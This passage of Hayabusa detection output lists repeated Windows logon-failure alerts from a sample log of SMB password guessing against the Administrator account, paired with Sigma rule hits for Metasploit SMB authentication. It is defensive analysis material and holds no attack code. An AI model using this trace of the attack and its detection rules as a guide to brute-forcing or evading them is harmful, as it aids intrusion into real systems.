+09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 